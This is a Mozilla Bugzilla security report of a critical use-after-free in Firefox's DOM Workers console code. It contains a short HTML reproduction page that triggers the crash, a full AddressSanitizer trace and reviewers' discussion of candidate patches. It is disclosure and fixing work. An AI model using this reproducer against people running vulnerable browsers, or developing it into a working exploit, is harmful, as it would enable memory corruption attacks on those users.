Closed Bug 1155546 Opened 6 years ago Closed 6 years ago

Use After Free of ConsoleRunnable

Categories

(Core :: DOM: Workers, defect)

40 Branch
x86_64
Linux
defect
Not set
normal

Tracking


RESOLVED FIXED
mozilla40
Tracking Status
firefox39 --- unaffected
firefox40 --- fixed
firefox-esr31 --- unaffected
firefox-esr38 --- unaffected
b2g-v2.0 --- unaffected
b2g-v2.0M --- unaffected
b2g-v2.1 --- unaffected
b2g-v2.1S --- unaffected
b2g-v2.2 --- unaffected

People

(Reporter: loobenyang, Assigned: baku)

References

Details

(Keywords: csectype-uaf, sec-critical)

Attachments

(3 files, 5 obsolete files)

Closing the worker right after a console.log() call can trigger a Use After Free in WorkerPrivate::NotifyFeatures.

Firefox Version: 40.0a1 (2015-04-16)
Operating System: Ubuntu 14.04 LTS 64bit

Reproduction test case (uaf_ConsoleRunnable.html): 

<html><body></body>
<script type="text/javascript">
var blob = new Blob(['console.log("AAAA");close();'],{type: "text/javascript"});
var worker = new Worker(window.URL.createObjectURL(blob));
setTimeout(function(){location.reload()},300);
</script></html>


Open uaf_ConsoleRunnable.html in a Firefox ASan build; ASan reports a Use After Free:


=================================================================
==5060==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b0000aa228 at pc 0x7fd283026020 bp 0x7fd259a8d930 sp 0x7fd259a8d928
READ of size 8 at 0x60b0000aa228 thread T22 (DOM Worker)
    #0 0x7fd28302601f in mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5930
    #1 0x7fd2830212c8 in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:6394
    #2 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #3 0x7fd283020e15 in mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5731
    #4 0x7fd28301ebcc in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5137
    #5 0x7fd282fc9c72 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:2790
    #6 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #7 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #8 0x7fd27eaa33c8 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:368
    #9 0x7fd27ea3024c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #10 0x7fd27ea3024c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #11 0x7fd27ea3024c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #12 0x7fd27e1e5ad8 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:364
    #13 0x7fd28a760135 in _pt_root /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #14 0x7fd28ada0181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
    #15 0x7fd27be0b30c (/lib/x86_64-linux-gnu/libc.so.6+0xfb30c)

0x60b0000aa228 is located 24 bytes inside of 112-byte region [0x60b0000aa210,0x60b0000aa280)
freed by thread T22 (DOM Worker) here:
    #0 0x474a01 in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7fd27e249bcc in nsRunnable::Release() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:32
    #2 0x7fd2801985e7 in ~nsRefPtr /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/base/../../dist/include/nsRefPtr.h:60
    #3 0x7fd2801985e7 in ~ConsoleReleaseRunnable /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/Console.cpp:361
    #4 0x7fd2801985e7 in mozilla::dom::ConsoleRunnable::PostDispatch()::ConsoleReleaseRunnable::~ConsoleReleaseRunnable() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/Console.cpp:361
    #5 0x7fd28304121c in Release /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:250
    #6 0x7fd28304121c in mozilla::dom::workers::WorkerControlRunnable::Release() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:529
    #7 0x7fd283020e50 in mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5735
    #8 0x7fd2830228f8 in ProcessAllControlRunnables /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.h:1291
    #9 0x7fd2830228f8 in mozilla::dom::workers::WorkerPrivate::OnProcessNextEvent(unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5265
    #10 0x7fd28304a2a5 in mozilla::dom::workers::WorkerThread::Observer::OnProcessNextEvent(nsIThreadInternal*, bool, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerThread.cpp:322
    #11 0x7fd27e1e8cb0 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:838
    #12 0x7fd27e24aafe in NS_ProcessPendingEvents(nsIThread*, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:207
    #13 0x7fd28302130d in ClearMainEventQueue /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5760
    #14 0x7fd28302130d in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:6399
    #15 0x7fd28161d9aa in mozilla::dom::WorkerGlobalScopeBinding_workers::close(JSContext*, JS::Handle<JSObject*>, mozilla::dom::workers::WorkerGlobalScope*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./WorkerGlobalScopeBinding.cpp:144
    #16 0x7fd28161636c in mozilla::dom::WorkerGlobalScopeBinding_workers::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./WorkerGlobalScopeBinding.cpp:1139
    #17 0x7fd2864cc0de in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #18 0x7fd2864cc0de in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:720
    #19 0x7fd28650bd2e in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2956
    #20 0x7fd2864ec731 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #21 0x7fd28651d55d in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:902
    #22 0x7fd28651dba4 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:941
    #23 0x7fd286f5e34a in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4211
    #24 0x7fd282fbf411 in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1590
    #25 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #26 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #27 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #28 0x7fd283028b07 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:6060
    #29 0x7fd282faba62 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.h:1417
    #30 0x7fd282faba62 in (anonymous namespace)::LoadAllScripts(JSContext*, mozilla::dom::workers::WorkerPrivate*, nsTArray<(anonymous namespace)::ScriptLoadInfo>&, bool, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1671
    #31 0x7fd282fab4b5 in mozilla::dom::workers::scriptloader::LoadMainScript(JSContext*, nsAString_internal const&, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1766
    #32 0x7fd283083e63 in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:1070
    #33 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #34 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #35 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #36 0x7fd28301f0f3 in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5229

previously allocated by thread T22 (DOM Worker) here:
    #0 0x474c01 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x4921cd in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7fd28014e719 in operator new /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/base/../../dist/include/mozilla/mozalloc.h:187
    #3 0x7fd28014e719 in mozilla::dom::Console::Method(JSContext*, mozilla::dom::Console::MethodName, nsAString_internal const&, mozilla::dom::Sequence<JS::Value> const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/Console.cpp:1142
    #4 0x7fd28014cca2 in mozilla::dom::Console::Log(JSContext*, mozilla::dom::Sequence<JS::Value> const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/Console.cpp:799
    #5 0x7fd2812c5d5c in mozilla::dom::ConsoleBinding::log(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Console*, JSJitMethodCallArgs const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./ConsoleBinding.cpp:2018
    #6 0x7fd281eb456f in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/bindings/BindingUtils.cpp:2578
    #7 0x7fd2864cc0de in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #8 0x7fd2864cc0de in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:720
    #9 0x7fd28650bd2e in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2956
    #10 0x7fd2864ec731 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #11 0x7fd28651d55d in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:902
    #12 0x7fd28651dba4 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:941
    #13 0x7fd286f5e34a in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4211
    #14 0x7fd282fbf411 in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1590
    #15 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #16 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #17 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #18 0x7fd283028b07 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:6060
    #19 0x7fd282faba62 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.h:1417
    #20 0x7fd282faba62 in (anonymous namespace)::LoadAllScripts(JSContext*, mozilla::dom::workers::WorkerPrivate*, nsTArray<(anonymous namespace)::ScriptLoadInfo>&, bool, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1671
    #21 0x7fd282fab4b5 in mozilla::dom::workers::scriptloader::LoadMainScript(JSContext*, nsAString_internal const&, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1766
    #22 0x7fd283083e63 in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:1070
    #23 0x7fd28303fae3 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:350
    #24 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #25 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #26 0x7fd28301f0f3 in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5229
    #27 0x7fd282fc9c72 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:2790
    #28 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #29 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #30 0x7fd27eaa33c8 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:368
    #31 0x7fd27ea3024c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #32 0x7fd27ea3024c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #33 0x7fd27ea3024c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #34 0x7fd27e1e5ad8 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:364

Thread T22 (DOM Worker) created by T0 (Web Content) here:
    #0 0x461475 in pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
    #1 0x7fd28a75cabd in _PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:453
    #2 0x7fd28a75c63a in PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:544
    #3 0x7fd27e1e6e3b in nsThread::Init() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:478
    #4 0x7fd283049c2a in mozilla::dom::workers::WorkerThread::Create(mozilla::dom::workers::WorkerThreadFriendKey const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerThread.cpp:90
    #5 0x7fd282f9f676 in mozilla::dom::workers::RuntimeService::ScheduleWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:1750
    #6 0x7fd282f9cda4 in mozilla::dom::workers::RuntimeService::RegisterWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:1604
    #7 0x7fd28301daf9 in mozilla::dom::workers::WorkerPrivate::Constructor(JSContext*, nsAString_internal const&, bool, mozilla::dom::WorkerType, nsACString_internal const&, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:4803
    #8 0x7fd28301d3f6 in Constructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:4738
    #9 0x7fd28301d3f6 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&, nsAString_internal const&, mozilla::ErrorResult&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:4679
    #10 0x7fd28162279b in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./WorkerBinding.cpp:738
    #11 0x7fd28651bf9e in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #12 0x7fd28651bf9e in CallJSNativeConstructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:268
    #13 0x7fd28651bf9e in js::InvokeConstructor(JSContext*, JS::CallArgs) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:821
    #14 0x7fd28650bd22 in Interpret(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2953
    #15 0x7fd2864ec731 in js::RunScript(JSContext*, js::RunState&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #16 0x7fd28651d55d in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:902
    #17 0x7fd28651dba4 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:941
    #18 0x7fd286f5e34a in Evaluate(JSContext*, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4211
    #19 0x7fd286f5eaaf in Evaluate /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4238
    #20 0x7fd286f5eaaf in JS::Evaluate(JSContext*, JS::AutoObjectVector&, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4293
    #21 0x7fd2804c0d96 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, nsJSUtils::EvaluateOptions const&, JS::MutableHandle<JS::Value>, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsJSUtils.cpp:265
    #22 0x7fd2804c1c8b in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&, JS::Handle<JSObject*>, JS::CompileOptions&, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsJSUtils.cpp:337
    #23 0x7fd280541cfa in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, JS::SourceBufferHolder&, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptLoader.cpp:1148
    #24 0x7fd28053f421 in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptLoader.cpp:978
    #25 0x7fd280538c63 in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptLoader.cpp:767
    #26 0x7fd2805342ce in nsScriptElement::MaybeProcessScript() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptElement.cpp:140
    #27 0x7fd27f9a0e34 in operator-> /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsIScriptElement.h:220
    #28 0x7fd27f9a0e34 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:663
    #29 0x7fd27f99f321 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:488
    #30 0x7fd27f9a5ddb in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5StreamParser.cpp:127
    #31 0x7fd27e1e8fe4 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:866
    #32 0x7fd27e24adea in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #33 0x7fd27eaa23e9 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:99
    #34 0x7fd27ea3024c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #35 0x7fd27ea3024c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #36 0x7fd27ea3024c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #37 0x7fd2834a1bc7 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:164
    #38 0x7fd285021fc2 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:738
    #39 0x7fd27ea3024c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #40 0x7fd27ea3024c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #41 0x7fd27ea3024c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #42 0x7fd2850216de in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:575
    #43 0x48d292 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:236
    #44 0x7fd27bd31ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5930 mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status)
Shadow bytes around the buggy address:
  0x0c168000d3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c168000d400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c168000d410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c168000d420: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c168000d430: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
=>0x0c168000d440: fa fa fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c168000d450: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c168000d460: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa 00 00
  0x0c168000d470: 00 00 00 00 00 00 00 00 00 00 06 fa fa fa fa fa
  0x0c168000d480: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c168000d490: 06 fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
==5060==ABORTING
Using the same object as nsRunnable (which is refcounted) and as WorkerFeature which isn't refcounted looks rather error prone.
Blocks: 1154076
Assignee: nobody → amarchesini
Attached patch crash.patch (obsolete) — Splinter Review
Attachment #8593892 - Flags: review?(bugs)
Attached patch crash.patch (obsolete) — Splinter Review
Also ConsoleRunnable must check whether mFeature leaks or not.
Attachment #8593894 - Flags: review?(bugs)
Attachment #8593892 - Attachment is obsolete: true
Attachment #8593892 - Flags: review?(bugs)
Attached patch crash.patch (obsolete) — Splinter Review
forgot hg qref.
Attachment #8593894 - Attachment is obsolete: true
Attachment #8593894 - Flags: review?(bugs)
Attachment #8593895 - Flags: review?(bugs)
Comment on attachment 8593895 [details] [diff] [review]
crash.patch

Bent is better reviewer for this.

(I wish WorkerFeatures were refcounted and their handling safer, that might have saved us here.)
Attachment #8593895 - Flags: review?(bugs) → review?(bent.mozilla)
Comment on attachment 8593895 [details] [diff] [review]
crash.patch

Review of attachment 8593895 [details] [diff] [review]:
-----------------------------------------------------------------

The runnable+feature combo should be just fine. We are not looking at a failure to dispatch because the report clearly shows that the runnable made it back to the worker thread and then got deleted after its refcount dropped to 0, exactly as expected. So somehow we still end up with a garbage pointer in the feature list.

Looking closer it seems like WorkerControlRunnable doesn't have a special Cancel hook (that would make it always Run(), like expected). That's what needs to be fixed.
Attachment #8593895 - Flags: review?(bent.mozilla) → review-
